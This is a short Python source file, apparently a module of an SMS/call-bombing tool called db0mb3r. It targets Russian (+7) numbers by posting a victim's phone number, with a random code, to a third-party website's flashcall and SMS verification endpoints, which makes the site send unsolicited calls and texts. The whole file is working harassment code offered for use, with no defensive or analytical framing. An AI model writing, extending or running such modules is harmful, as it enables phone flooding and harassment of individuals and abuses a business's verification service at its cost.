flashcall.py 541 B

12345678910111213141516171819202122
  1. from random import randint
  2. from db0mb3r.services.service import Service
  3. class FlashCall(Service):
  4. phone_codes = [7]
  5. async def run(self):
  6. await self.post(
  7. "https://i-dgtl.ru/curl/flashcall.php",
  8. data={
  9. "check": "",
  10. "flashcall-code": randint(1000, 9999),
  11. "flashcall-tel": self.phone,
  12. },
  13. )
  14. await self.post(
  15. "https://i-dgtl.ru/curl/sms.php",
  16. data={"check": "", "flashcall-tel": self.phone},
  17. )